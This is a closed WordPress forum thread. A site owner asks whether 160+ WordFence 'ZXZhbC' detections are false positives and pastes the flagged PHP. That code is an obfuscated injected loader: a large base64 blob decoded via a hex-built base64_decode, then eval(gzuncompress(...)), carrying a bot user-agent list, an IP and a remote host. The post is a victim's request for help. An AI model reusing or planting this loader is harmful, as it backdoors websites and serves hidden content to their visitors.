A known malicious file is: "ZXZhbC" … False Positive or a Real Problem?
-
Hi Team,
We acquired this WordPress site a few weeks ago. The short history is that the client (unbeknownst to us) had it installed on a Windows box. With a few backflips we were able to migrate it over to our LAMP server. That said, it still has quite a few quirks (either from this reality or as a product of a previous developer).On our initial WordFence scan of this site, we did not receive any errors. Last week in a scan it threw 240 errors. Many of the errors are trivial, but 160+ are: “The text we found in this file that matches a known malicious file is: “ZXZhbC”.”
In spot checking ~10 of these errors they all have the same PHP script (copied below). Any help on interpreting this script and/or determining if it is a false positive would be greatly appreciated.
***********************
<?php /*versio:3.02*/ $GLOBALS["nndvlq"]="NNaW5pX3NldAStJYWxsb3dfdXJsX2ZvcGVuPJZGlzcGxheV9lcnJvcnMLKXXUQam5ldC9hMjQwN3JzX3RoZW0ZdMy4wMgfZVGVWlHaDR1ZTVvaE5nZWVodWo3ZWUQVraHR0cDovLwFcSFRUUFMYqub2ZmwZaHR0cHM6Ly8jkRSFRUUF9IT1NUOFCdW5pb24LagrKGvzjc2VsZWN0ssUkVRVUVTVF9VUkkScMU0NSSVBUX05BTUUVQSCIUVVFUllfU1RSSU5HJnKxrPwZhuYZGV0ZXJtaW5hdG9ymPvjLgWboNtLmxvZwEmVlzSFRUUF9ZX0FVVEgHrYmFzZTY0X2RlY29kZQnZCIBdmVyc2lvdCxHoLQpwXLXBocAipDSFRUUF9FWEVDUEhQzib3V0RPtEBNb2sKSFRUUF9VU0VSX0FHRU5ULAcTOZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleADZueyhYQvedrNzcuODEuMjQ1LjYyzesPZmFzdGFkZHouY29tMrwMZL3czLnBocD91PQBdEJms9AJnQ9cGhwJnA9IqCOMJnY9EZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYzdHZtMGdRL3lvYlpGVllVTXpMTm02T1U2S2VlNDNVU3lMWE9hbnFSUWpEZ29reFlCNStSZm51Ti92QVlNZnUzVi9HczdQem50L01SZ0VTcjN3Y1JBbjJSY0hISmM2WFVlS1dhUzUwdTY4b2d1T2dTcnd5U2hNSGI2T2lMRVEvVE1KaWxvV2lMcW15cG5ZSjMwMlVSRTZCeStaUWxiUytyS3RkR1duZDZ6UG51aVpwQTFrYkFZTUtERytvVm9PY0lJMXdHVzdMc25JTHNSUHU0czB1bDlHSHpzeGY3Ylloc3RIOTA3ZHZYZlNLR3NveTh2SzBqSlpZTFBNS2c3d2NsMVdlb0FDblFTM2lSRXVNeTBXWnJSYXJWUUlzeXl6SjNhV01Pc3R3NDdsdWx3clA4andHNFlKWDViRndqYmdjTDl3VEtqOVhCQWQ4SytHWXhJcjZHWUtmZ2h2SDZjYUJpK0JPaGhPaGkyeVFwQW5FYm03Y1RSREZtSEE3WHBxVU9JSFlDdk95ekQ3MWVnSlNFTGVKZmxHakZDUjgyTmhCNkFuVUZSd1grRngrV21hUzFIUXFISzRYTzdENHBuVWlnb2pPY3JzUDNmV1JMNUNqTkNQZWRMdzRqMmZMbzBPOHhSNGMzZkNMSWhjdG84OVBrMjhQajFNSGZtVDBQM3p3S3VMQ1pUbGZ4N2QvakNjeUNsenc4WmVjay9IMGFYSS9uZHplZi85Q2J2RDBYNzd3K2VIK2Z2eDVPcjM3YS96d05KWFJnQVJpRXlUNU9xRWhZbTdYOTRnb2tuM0hpOU1DdDZnazhIaVpsVHVSWDRaUU4ySUU0ZnF0empLbjFoa2paY3ZTUU5RRlJlb3RTSDAwRldpcFVJVzcxU3FLWGZqd1ovR3lXTWlvejNYV3RVekViSXQ0RmUrWk9uVGNIV0Iya0ZWbHEzMkVQOGRUOU1xejhDWW9KQTNGQW4yZFRoOTdtcUlDNFovOG53Uit2cVpGK1FuQnh5czM2WTBla0RETjV1dDBYb0NLeDYrUHpzTjNSZWdKQ3ZuOGV6ejVmdmR3ZjBicFU0SHpqN2NoMVBZblVNN3VVM20xek0wY2VrQzh1dER6M0trdSt2QUJpU2M5amo0Mng3OGh2ZHNFUkNHQmhiWnFDZEowaS9iTVRjQVRlWUNFanVmRnUzd09UdUZ0RnFjK0ZvV0RmWEl0RXZpcWhNQVg1LzZwUGpjWUV5M1AzR044Vk9mYkVleXNxbzFmN25mQktseEdJQTRxWWgwQVA0NlMvU29CSjdBM1Q1SHd3eEVVZnFnSW4rQ2JuZk1rSFFQWmV2MlNWLzZMNjFmK1RPejRtWi9FV2JjQm1ZN3pmVHlCRFAza1I4L2tkcWNzNDBYczJnYzROa2FTYnNpNlFTSlNyTGR4RVRabmxpNzFaZG9ueVR5cVpuNXpNalRwclNFRkUxb3NyVnVtWkJwa1ByRENqUW9hdjlxWUE1dG1EQ1JESG5hZjYzRno4NTRIMUF6NmhBZGQyYWhSb0VxRGtXeFNqRHRWcmhsOVNZZnBwUEVNY0FiRkxzcThUQUdaY1g1T2tXWllrcUhKbXQ0bCtRM1NITHZlSEpyT0ljM2pGb2lueFA2OXlSY3hHWVJtS1ZRYkk4cE5VTWtRTk1Gd0FnNUV4azh1NExteGRDUnAxa0NHS0RXQWZrbWNadWpTd0pLdFg0blRWRXV5aGt6ZUd4Z25YbDBNL0ZEU1JwQ2dQZ2s5Z1pQM0hLWXFEVlhLUWFIeFBZTUsxbXNqeWtHeWZESEpPdFNKYnNyYTRMSXV6WkJHUTZaTGFTVlpVOG1lWU1sNkYyYklHUk4wclM4WkJwVjhmZEpwODkwK3JYSS9YL2hlSXBJaTJTVGJWVG0zL1NoUFhFQVJ4L2x5OTIzc09GM2xqN3NKaklTSHlROFEvM2c3dVlWUEtPamRMcGh2RitENWJaNjdPeEVKUFIrdmU4VjhDZjB0OU1wbDFsTUNtTnNmcXlUYU5xUzd6K09hMHBnclRQOTZGSjZQS2VNRGFYei9kNXVqL2d0V0hWSDRCYXFIU0Qrc0doWGdqK3M3UUhiQU53RTJLdTZxSWpEV3c5OU45cEd2R2oxMnFiaHc2a0hkWXpnNzZnSWVFTklIeWNzbTNHOTQrVi94UWNpSkpOVHNVN0hQUnBZdFNvV3p5YVBTblFIOHQyOHlZOGphd1lqWGFBYjZGeldRSG9ZcVpidW1OVTQ3Sm01bUtKa0hnRHV2aU8yMXJaMVROYVNoVG9xbFhqcnJsdXRVd1RyYkxPd2FKODRWdXdXUTBtZjlBbmErYkRPL3dQYk4wdS9YZWhVK0ZqbUFLaHd1Q1RoR2U3eDBLL3VrSnBXakJobHFVT1VLRjN6OXpuZ05LbDBicU14NkxwQ0kzbTM4OVFzbUFXTTBwZFhoaHFUcEl3cmRGNUJWMDNWQUFZMTZaZHRjTjNIUHcvNDJUQnRjMFVlbVpNQytUc1lvRzFGOEVoMFB0QWF5RFVtSFRjWWl0dkp3TkxBSXVLSVBxTE5zRExYaU1CeEpJeDBzcnRlZEJhd0hzOXptOXB4MVlRQ3F0Q0VIRjNpSzRMVWIxeGYvcDdWYTM1SjBVNFZoSWpmUUE0Z0YyR3pLUnBlVnlqWXFSVlkxblJMMjBrVUtNZjlDRmxTeUdlRnFNeWZMMTgxL0RCaDFLQmtxZlJnZFRaaDY5MmpGRzZBVmdFMXZXMlFhWkJMM1llVFJKa3k5ZERlUFQyWVFzMFErbkY3Wk5qV1NKRFV1Z3Bka1FmZE90bk9lVm95dW10TElrZ2RIU3ZzRHlTU2xTWXB0SG9YRnl3dVJVSkdPODRqTlozdGxTQllEMml0a0t5U2REbTNPOU1PU1RwYTRMaXd6Sld3MnpFNytoOG1IUDNRNVBHeHI3Q0l4Z0VYZW5zSUdlSVFNTmFhUUoxWHRGNjJHTXEyOHVkajBDOENtRjFjK2R0TEV3eTE2Q3d2cTdNS0RqZWlobTJXMmdsM3pNQXZhcjFqVDRvalNFQTJwcjlKR3JSdnYyQWo2S0dONDB3b2pKOUZWaWk3cHFEVUc5UUcwRE5TaVprTFRNTVpXUDZrRFFLYStiQjdRbzVYUkFheFh4Smh6M2FZTis1S3BXdlFpYTFKUUhnUlp0czlBK2NrTG1ZVUFOdC9ta1h6OVByd01wZmxENXhUQ0xKamxJNU5GaTI5bS93Sk5BRHJ5IikpKTsD"; if (!function_exists('dgngsbpg')){function dgngsbpg($a, $b){$c=$GLOBALS['nndvlq'];$d=pack('H*','6261736536'.'345f6465636f6465'); return $d(substr($c, $a, $b));};eval(dgngsbpg(588,3299));};?><?php
- The topic ‘A known malicious file is: "ZXZhbC" … False Positive or a Real Problem?’ is closed to new replies.
